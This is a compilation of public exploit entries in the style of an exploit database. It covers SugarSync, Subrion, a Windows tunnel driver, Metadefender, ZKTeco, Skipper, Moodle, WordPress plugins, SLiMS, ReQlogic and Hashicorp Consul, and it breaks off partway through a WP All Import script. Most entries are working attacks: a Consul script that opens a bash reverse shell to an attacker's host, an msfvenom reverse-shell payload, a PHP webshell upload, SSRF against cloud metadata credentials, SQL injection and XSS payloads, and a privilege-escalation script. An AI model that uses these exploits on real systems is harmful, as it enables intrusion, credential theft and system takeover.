# Exploit Author: Jorge Manuel Lozano Gómez
# Date: 2022-10-20
# Vendor Homepage: https://www1.sugarsync.com
# Software Link: https://www1.sugarsync.com/apps/windows/
# Version : 4.1.3
# Tested on: Windows 11 64bit
# CVE : N/A
About Unquoted Service Path :
==============================
When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
Description:
==============================
SugarSync installs a service with an unquoted service path.
To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
# PoC
===========
1. Open CMD and check for the vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
2. The vulnerable service would show up.
3. Check the service permissions by typing [ sc qc "SugarSync Service" ]
4. The command would return..
C:\>sc qc "SugarSync Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SugarSync Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\SugarSync\SugarSyncSvc.exe
LOAD_ORDER_GROUP :
TAG : 0
ISPLAY_NAME : SugarSync Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
5. This concludes that the service is running as SYSTEM.
6. Now create a payload with msfvenom or other tools and name it to SugarSyncSvc.exe.
7. Make sure you have write permissions to "C:\Program Files (x86)\SugarSync" directory.
8. Provided that you have right permissions, drop the SugarSyncSvc.exe executable you created into the "C:\Program Files (x86)\SugarSync" directory.
9. Start a listener.
9. Now restart the SugarSync service by giving coommand [ sc stop "SugarSync Service" ] followed by [ sc start "SugarSync Service" ]
9.1 If you cannot stop and start the service, since the service is of type "AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ] and get the shell when the service starts automatically.
10. Got shell.
During my testing :
Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o SugarSyncSvc.exe
# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
# Exploit Title: Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)
# Date: 2022-08-10
# Exploit Author: Sinem Şahin
# Vendor Homepage: https://intelliants.com/
# Version: 4.2.1
# Tested on: Windows & XAMPP
==> Tutorial <==
1- Go to the following url. => http://(HOST)/panel/fields/add
2- Write XSS Payload into the tooltip value of the field add page.
3- Press "Save" button.
4- Go to the following url. => http://(HOST)/panel/members/add
XSS Payload ==> "<script>alert("field_tooltip_XSS")</script>
Reference: ://github.com/intelliants/subrion/issues/895
// Exploit Title: Tunnel Interface Driver - Denial of Service
// Date: 07/15/2022
// Exploit Author: ExAllocatePool2
// Vendor Homepage: https://www.microsoft.com/
// Software Link: https://www.microsoft.com/en-us/software-download/windows10
// Version: Windows 10 Pro Version 21H2 (OS Build 19044.1288)
// Tested on: Microsoft Windows
// GitHub Repository: https://github.com/Exploitables/MSRC-1
#include <Windows.h>
#include <stdio.h>
#define TARGET_DEVICE "\\\\.\\GLOBALROOT\\Device\\TunnelControl"
int main(int argc, char** argv);
int main(int argc, char** argv)
{
HANDLE h_driver = CreateFileA(TARGET_DEVICE, 0x80, 0, 0, OPEN_EXISTING, 0, 0);
unsigned long long input_output = 0x4242424242424242;
unsigned long bytes_returned = 0x43434343;
unsigned char unused = 0;
SetConsoleTitleA("https://msrc.microsoft.com/");
printf("[*] Microsoft Security and Response Center Report #1\n[*] Microsoft Tunnel Interface Driver Null Pointer Dereference Denial of Service Vulnerability\n[*] Exploit written by ExAllocatePool2\n[!] Let's exploit!");
if (h_driver == (HANDLE)-1)
{
printf("\n[-] Failed to obtain a handle to the vulnerable device driver. Error: %d (0x%x)", GetLastError(), GetLastError());
unused = getchar();
return 1;
}
printf("\n[+] Obtained a handle to the vulnerable device driver. Handle Value: 0x%p", h_driver);
printf("\n[!] Triggering a denial of service via arbitrary read in 3...");
for (int i = 2; i > 0; i--)
{
Sleep(1000);
printf("\n[!] %d...", i);
}
DeviceIoControl(h_driver, 0, &input_output, 8, &input_output, 8, &bytes_returned, 0);
unused = getchar();
printf("\n[-] Exploit failed. The machine should have crashed.");
return 0;
}
# Exploit Title: OPSWAT Metadefender Core - Privilege Escalation
# Date: 24 October 2022
# Exploit Author: Ulascan Yildirim
# Vendor Homepage: https://www.opswat.com/
# Version: Metadefender Core 4.21.1
# Tested on: Windows / Linux
# CVE : CVE-2022-32272
# =============================================================================
# This is a PoC for the Metadefender Core Privilege escalation vulnerability.
# To use this PoC, you need a Username & Password.
# The OMS_CSRF_TOKEN allows users to execute commands with higher privileges.
# =============================================================================
#!/usr/bin/env python3
import requests
import json
from getpass import getpass
url = input("Enter URL in this Format (http://website.com): ")
username = input("Username: ")
password = getpass("Password: ")
url_login = url+'/login'
url_user = url+'/user'
logindata = {"user":username,"password":password}
## Get the OMS_CSRF_TOKEN & session cookie
response_login = requests.post(url_login, json = logindata).json()
json_str = json.dumps(response_login)
resp = json.loads(json_str)
token = resp['oms_csrf_token']
session = resp['session_id']
## Prepare Header & Cookie
headers = {
"oms_csrf_token": token,
}
cookie = {
"session_id_ometascan": session
}
## Set Payload to get Admin role
payload = '{"roles": ["1"]}'
response = requests.put(url_user,headers=headers,cookies=cookie,data=payload)
print("Response status code: "+str(response.status_code))
if response.status_code == 200:
print("Expolit Successful!")
else:
print("Exploit Unsuccessful")
# Exploit Title: ZKTeco ZEM/ZMM 8.88 - Missing Authentication
# Exploit Author: RedTeam Pentesting GmbH
# CVE: CVE-2022-42953
Advisory: Missing Authentication in ZKTeco ZEM/ZMM Web Interface
The ZKTeco time attendance device does not require authentication to use the
web interface, exposing the database of employees and their credentials.
Details
=======
Product: ZKTeco ZEM500-510-560-760, ZEM600-800, ZEM720, ZMM
Affected Versions: potentially versions below 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720) and 15.00 (ZMM200-220-210)
Fixed Versions: firmware version 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720), firmware version 15.00 (ZMM200-220-210)
Vulnerability Type: Missing Authentication
Security Risk: medium
Vendor URL: https://zkteco.eu/company/history
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-003
Advisory Status: published
CVE: CVE-2022-42953
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42953
Introduction
============
"Time attendance and workforce management is an integrated set of
processes that an institution uses to optimize the productivity of its
employees on the individual, departmental, and entity-wide levels.
ZKTeco has been at the forefront of time attendance solutions for the
last 30 years, integrating advanced biometric technologies with
innovative and versatile terminals." (from company website)
More Details
============
The ZKTeco ZEM/ZMM device allows to store a list of users and their credentials
which may be used to log into the device to prove the users' attendance. These
credentials can either be a PIN, a card for a variety of card readers, or a
fingerprint. The user list can be managed through the web interface.
When opening the web interface, for example on http://192.0.2.1/,
the web server of the device sends a Set-Cookie header for a cookie with
name and value similar to the following:
-----------------------------------------------------------------------
Set-Cookie: SessionID=1624553126; path=/;
-----------------------------------------------------------------------
It was determined that the value of the cookie is roughly the number of
seconds since January 1, 1970. Since the value has a constant offset,
that might allow attackers to guess the cookie value. After setting the
cookie, the webserver redirects the browser to "/csl/login". The login
form provided at this URL has its form action set to "/csl/check". If
the user provides wrong credentials, the web server responds with an
error message. If the user provides correct credentials, the server
responds with a frameset.
In this frameset various options are available, for example a user list.
The list contains a link titled "Options" for each user item which
references a URL similar to the following
http://192.0.2.1/csl/user?did=0&uid=123
Additionally, backups of all settings of the device can be downloaded
from the backup page. The request to do so looks similar to the
following:
-----------------------------------------------------------------------
POST /form/DataApp HTTP/1.1
Host: 192.0.2.1
User-Agent: Mozilla/5.0
Cookie: SessionID=1624553126
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Origin: http://192.0.2.1
Referer: http://192.0.2.1/form/Device?act=11
style=1
-----------------------------------------------------------------------
When the value "1" is given for the field named "style", the web server
responds with the file "device.dat" (corresponding to the option "Backup
System Data" in the web interface), for all other values the server
responds with the file "data.dat" (corresponding to the option "Backup
User Data" in the web interface). Both files can not only be requested
using HTTP-POST, but also using HTTP-GET with the following URLs:
http://192.0.2.1/form/DataApp?style=1
http://192.0.2.1/form/DataApp?style=0
Both files are - even though it's not obvious from the filename -
compressed tar archives. They can be extracted in the following way:
-----------------------------------------------------------------------
$ mv data.dat data.tgz
$ tar xvzf data.tgz
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/group.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/htimezone.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/lockgroup.dat
rwxrwxrwx 500/513 10512 2021-06-23 07:23 mnt/mtdblock/ssruser.dat
rwxr-xr-x root/root 819896 2021-06-18 07:23 mnt/mtdblock/tempinfo.dat
rwxrwxrwx 500/513 19456 2005-05-05 07:05 mnt/mtdblock/template.dat
rw-r--r-- root/root 360448 2021-06-18 07:23 mnt/mtdblock/templatev10.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/timezone.dat
rwxrwxrwx 500/513 1372 2005-05-05 07:25 mnt/mtdblock/user.dat
rwxr-xr-x root/root 120 1970-01-01 01:08 mnt/mtdblock/data/alarm.dat
rwxr-xr-x root/root 0 2021-06-23 09:55 mnt/mtdblock/data/extlog.dat
rwxr-xr-x root/root 0 2013-05-04 01:28 mnt/mtdblock/data/extuser.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/group.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/htimezone.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/lockgroup.dat
rwxr-xr-x root/root 54800 2021-06-23 09:55 mnt/mtdblock/data/oplog.dat
rwxr-xr-x root/root 33200 2021-06-23 07:23 mnt/mtdblock/data/sms.dat
rwxr-xr-x root/root 0 2021-06-23 09:55 mnt/mtdblock/data/ssrattlog.dat
rwxr-xr-x root/root 660 2018-11-09 17:28 mnt/mtdblock/data/stkey.dat
rwxrwxrwx 500/513 0 2013-05-04 01:28 mnt/mtdblock/data/template.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/timezone.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/transaction.dat
rwxr-xr-x root/root 952 2021-06-23 07:24 mnt/mtdblock/data/udata.dat
rwxr-xr-x root/root 0 1970-01-01 01:08 mnt/mtdblock/data/user.dat
rwxr-xr-x root/root 0 2013-05-04 01:28 mnt/mtdblock/data/wkcd.dat
-----------------------------------------------------------------------
In this archive, the file "mnt/mtdblock/templatev10.dat" will likely
contain fingerprints, and the file "mnt/mtdblock/ssruser.dat" contains
the user database. The user database contains 72 byte user records, each
containing the privilege level, the PIN, the name of the user, data
stored on external authentication tokens like cards, and the group of
the user.
While the cookie value might be guessable, it is not used for
authentication purposes. An attacker with knowledge of the
corresponding URLs could access the user detail view or the backup
without any authentication.
Proof of Concept
================
http://192.0.2.1/form/DataApp?style=1
http://192.0.2.1/form/DataApp?style=0
http://192.0.2.1/csl/user?did=0&uid=123
Workaround
==========
Network access to the device should be limited to trustworthy persons.
This might be hard to implement if the device is installed in a public
space, especially if it is used for access control, too.
Fix
===
Currently, it is not known whether a newer version might fix this issue.
Due to the age of the product, the vendor might decide not to create a
fix at all.
Security Risk
=============
Attackers with network access to a ZKTeco ZEM/ZMM time attendance device
can get access to employee data, including the credentials used for
accessing the time attendance device. If these credentials are used for
other purposes than time attendance, such as physical access control,
attackers might use them to gain access to protected areas. The actual
risk estimate varies wildly with the kind of access control system in
place and whether network access to the device is prevented by other
means, such as nearby security guards. For this reason, missing
authentication to the ZEM/ZMM web interface is estimated to pose a medium
risk. This estimate might need to be adjusted to the specific use case
of the device.
Timeline
========
2021-06-24 Vulnerability identified
2021-07-12 Customer approved disclosure to vendor
2021-07-16 Vendor notified
2021-08-20 Vendor provides fixed firmware
2022-09-29 Customer approved release of advisory
2022-10-10 CVE ID requested
2022-10-15 CVE ID assigned
2022-10-24 Advisory published
References
==========
https://zkteco.eu/company/history
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Alter Posthof 1 Fax : +49 241 510081-99
52062 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
#Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)
#Date: 24/10/2022
#Exploit Author: Hosein Vita & Milad Fadavvi
#Vendor Homepage: https://github.com/zalando/skipper
#Software Link: https://github.com/zalando/skipper
#Version: < v0.13.237
#Tested on: Linux
#CVE: CVE-2022-38580
Summary:
Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.
Proof Of Concept:
1- Add header "X-Skipper-Proxy" to your request
2- Add the aws metadata to the path
GET /latest/meta-data/iam/security-credentials HTTP/1.1
Host: yourskipperdomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
X-Skipper-Proxy: http://169.254.169.254
Connection: close
Reference:
https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2
# Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting (XSS)
# Date: 26/10/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://moodle.org/
# Software Link: https://git.in.moodle.com/moodle
# Version: 4.0
# Tested on: XAMPP, Windows 10
# Contact: https://twitter.com/dmaral3noz
Description:
A Cross Site Scripting (XSS) vulnerability exists in Moodle is a free and open-source Learning Management System (LMS) written in PHP and distributed under the GNU General Public License
Vulnerable Code:
line 111 in file "course/search.php"
echo $courserenderer->search_courses($searchcriteria);
Steps to exploit:
1) Go to http://localhost/course/search.php
2) Insert your payload in the "search"
Proof of concept (Poc):
The following payload will allow you to run the javascript -
"><img src=# onerror=alert(document.cookie)>
## Title: Social-Share-Buttons v2.2.3 - SQL Injection
## Author: nu11secur1ty
## Date: 09.16.2022
## Vendor: https://wordpress.org/
## Software: https://downloads.wordpress.org/plugin/social-share-buttons-by-supsystic.2.2.3.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3
## Description:
The `project_id` parameter from the Social Share Buttons-2.2.3 on the
WordPress-6.0.2 system appears to be vulnerable to SQL injection
attacks.
The malicious user can dump-steal the database, from this system and
he can use it for very malicious purposes.
WARNING: The attacker can retrieve all-database from this system!
NOTE: The users of this system are NOT protected, this SQL
vulnerability is CRITICAL!
STATUS: HIGH Vulnerability
[+]Payload:
```mysql
---
Parameter: project_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=social-sharing-share&project_id=378116348' or
'3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=social-sharing-share&project_id=378116348' or
'3724'='3724' AND (SELECT 9167 FROM (SELECT(SLEEP(5)))dQDw) AND
'KWbC'='KWbC&network_id=5&post_id=
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3)
## Proof and Exploit:
[href](https://streamable.com/m9r76w)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: iBooking v1.0.8 - Arbitrary File Upload
# Exploit Author: d1z1n370/oPty
# Date: 01/11/2022
# Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088
# Tested on: Linux
# Version: 1.0.8
# Exploit Description:
The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.
# PoC request
POST https://localhost/dashboard/upload-new-media HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/dashboard/settings
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062
Content-Length: 449
Connection: close
Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
-----------------------------115904534120015298741783774062
Content-Disposition: form-data; name="_token"
kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW
-----------------------------115904534120015298741783774062
Content-Disposition: form-data; name="is_modal"
1
-----------------------------115904534120015298741783774062
Content-Disposition: form-data; name="file"; filename="upload.php56"
Content-Type: image/gif
GIF89a;
<?php system($_GET['a']); phpinfo(); ?>
-----------------------------115904534120015298741783774062--
# Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)
# Date: 9 October 2022
# Exploit Author: Okan Kurtulus
# Vendor Homepage: https://reqlogic.com
# Version: 11.3
# Tested on: Linux
# CVE : 2022-41441
# Proof of Concept:
1- Install ReQlogic v11.3
2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3
3- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.
#XSS Payload:
</script><script>alert(1)</script>
#Affected Prameters
POBatch
WaitDuration
#Final URLs
http://localost:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3
http://localost:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>
# Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution (RCE)
# Date: 26/10/2022
# Exploit Author: GatoGamer1155, 0bfxgh0st
# Vendor Homepage: https://www.consul.io/
# Description: Exploit for gain reverse shell on Remote Command Execution via API
# References: https://www.consul.io/api/agent/service.html
# Tested on: Ubuntu Server
# Software Link: https://github.com/hashicorp/consul
import requests, sys
if len(sys.argv) < 6:
print(f"\n[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} <rhost> <rport> <lhost> <lport> <acl_token>\n")
exit(1)
target = f"http://{sys.argv[1]}:{sys.argv[2]}/v1/agent/service/register"
headers = {"X-Consul-Token": f"{sys.argv[5]}"}
json = {"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{sys.argv[3]}/{sys.argv[4]} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}
try:
requests.put(target, headers=headers, json=json)
print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")
except:
print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")
## Title: Senayan Library Management System v9.5.0 - SQL Injection
## Author: nu11secur1ty
## Date: 11.03.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0
## Description:
The `keywords` parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the keywords parameter, and a general
error message was returned.
Two single quotes were then submitted and the error message
disappeared. The injection is confirmed manually from nu11secur1ty.
The attacker can retrieve all information from the database of this
system, by using this vulnerability.
## STATUS: HIGH Vulnerability
[+] Payload:
```MySQL
---
Parameter: keywords (GET)
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT
SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)
Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))
RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0)
## Proof and Exploit:
[href](https://streamable.com/63og5v)
## Time spent
`3:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 11.03.2022
## Vendor: https://www.rukovoditel.net/
## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1
## Description:
The application is vulnerable to DOM-based cross-site scripting
attacks. Data is read from `location.hash` and passed to
`jQuery.parseHTML`.
The attacker can use this vulnerability to create an unlimited number
of accounts on this system until it crashed.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Payload:
```POST
GET /rukovoditel/index.php?module=users/restore_password HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg;
cookie_test=please_accept_for_session;
app_login_redirect_to=module%3Ddashboard%2F
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/login
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1)
## Proof and Exploit:
[href](https://streamable.com/i1qmfk)
## Time spent
`3:45`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 11/05/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://www.wpallimport.com/
# Software Link: https://wordpress.org/plugins/wp-all-import/advanced/ (scroll down to select the version)
# Version: <= 3.6.7 (tested: 3.6.7)
# Tested on: WordPress 6.1 (os-independent since this exploit does NOT provide the payload)
# CVE: CVE-2022-1565
#!/usr/bin/python
import requests
import re
import os
# WARNING: This exploit does NOT include the payload.
# Also, be sure you already have some valid admin credentials. This exploit needs an administrator account in order to work.
# If a file with the same name as the payload is already on the server, the upload will OVERWRITE it
#
# Please notice that I'm NOT the researcher who found this vulnerability
# # # # # VULNERABILITY DESCRIPTION # # # # #
# The plugin WP All Import is vulnerable to arbitrary file uploads due to missing file type validation via the wp_all_import_get_gz.php file in versions up to, and including, 3.6.7.
# This makes it possible for authenticated attackers, with administrator level permissions and above, to upload arbitrary files on the affected sites server which may make remote code execution possible.
# # # # # HOW THE EXPLOIT WORKS # # # # #
# 1. Prepare the zip file:
# - create a PHP file with your payload (e.g. rerverse shell)
# - set the variable "payload_file_name" with the name of this file (e.g. "shell.php")
# - create a zip file with the payload
# - set the variable "zip_file_to_upload" with the PATH of this file (e.g. "/root/shell.zip")
#
# 2. Login using an administrator account:
# - set the variable "target_url" with the base URL of the target (do NOT end the string with the slash /)
# - set the variable "admin_user" with the username of an administrator account
# - set the variable "admin_pass" with the password of an administrator account
#
# 3. Get the wpnonce using the get_wpnonce_upload_file() method
# - there are actually 2 types of wpnonce:
# - the first wpnonce will be retrieved using the method retrieve_wpnonce_edit_settings() inside the PluginSetting class.
# This wpnonce allows us to change the plugin settings (check the step 4)
# - the second wpnonce will be retrieved using the method retrieve_wpnonce_upload_file() inside the PluginSetting class.
# This wpnonce allows us to upload the file
#
# 4. Check if the plugin secure mode is enabled using the method check_if_secure_mode_is_enabled() inside the PluginSetting class
# - if the Secure Mode is enabled, the zip content will be put in a folder with a random name.
# The exploit will disable the Secure Mode.
# By disabling the Secure Mode, the zip content will be put in the main folder (check the variable payload_url).
# The method called to enable and disable the Secure Mode is set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str)
# - if the Secure Mode is NOT enabled, the exploit will upload the file but then it will NOT enable the Secure Mode.
#
# 5. Upload the file using the upload_file(wpnonce_upload_file: str) method
# - after the upload, the server should reply with HTTP 200 OK but it doesn't mean the upload was completed successfully.
# The response will contain a JSON that looks like this:
# {"jsonrpc":"2.0","error":{"code":102,"message":"Please verify that the file you uploading is a valid ZIP file."},"is_valid":false,"id":"id"}
# As you can see, it says that there's an error with code 102 but, according to the tests I've done, the upload is completed
#
# 6. Re-enable the Secure Mode if it was enabled using the switch_back_to_secure_mode() method
#
# 7. Activate the payload using the activate_payload() method
# - you can define a method to activate the payload.
# There reason behind this choice is that this exploit does NOT provide any payload.
# Since you can use a custom payload, you may want to activate it using an HTTP POST request instead of a HTTP GET request, or you may want to pass parameters
# # # # # WHY DOES THE EXPLOIT DISABLE THE SECURE MODE? # # # # #
# According to the PoC of this vulnerability provided by WPSCAN, we should be able to retrieve the uploaded files by visiting the "MAnaged Imports page"
# I don't know why but, after the upload of any file, I couldn't see the uploaded file in that page (maybe the Pro version is required?)
# I had to find a workaround and so I did, by exploiting this option.
# WPSCAN Page: https://wpscan.com/vulnerability/578093db-a025-4148-8c4b-ec2df31743f7
# # # # # ANY PROBLEM WITH THE EXPLOIT? # # # # #
# In order for the exploit to work please consider the following:
# 1. check the target_url and the admin credentials
# 2. check the path of the zip file and the name of the payload (they can be different)
# 3. if you're testing locally, try to set verify_ssl_certificate on False
# 4. you can use print_response(http_response) to investigate further
# Configure the following variables:
target_url = "https://vulnerable.wp/wordpress" # Target base URL
admin_user = "admin" # Administrator username
admin_pass = "password" # Administrator password
zip_file_to_upload = "/shell.zip" # Path to the ZIP file (e.g /root/shell.zip)
payload_file_name = "shell.php" # Filename inside the zip file (e.g. shell.php). This file will be your payload (e.g. reverse shell)
verify_ssl_certificate = True # If True, the script will exit if the SSL Certificate is NOT valid. You can set it on False while testing locally, if needed.
# Do NOT change the following variables
wp_login_url = target_url + "/wp-login.php" # WordPress login page
wp_all_import_page_settings = target_url + "/wp-admin/admin.php?page=pmxi-admin-settings" # Plugin page settings
payload_url = target_url + "/wp-content/uploads/wpallimport/uploads/" + payload_file_name # Payload will be uploaded here
re_enable_secure_mode = False
session = requests.Session()
# This class helps to retrieve plugin settings, including the nonce(s) used to change settings and upload files.
class PluginSetting:
# Regular Expression patterns
pattern_setting_secure_mode = r'<input[a-zA-Z0-9="_\- ]*id="secure"[a-zA-Z0-9="_\-/ ]*>'
pattern_wpnonce_edit_settings = r'<input[a-zA-Z0-9="_\- ]*id="_wpnonce_edit\-settings"[a-zA-Z0-9="_\- ]*value="([a-zA-Z0-9]+)"[a-zA-Z0-9="_\-/ ]*>'
pattern_wpnonce_upload_file = r'wp_all_import_security[ ]+=[ ]+["\']{1}([a-zA-Z0-9]+)["\']{1};'
http_response: requests.Response
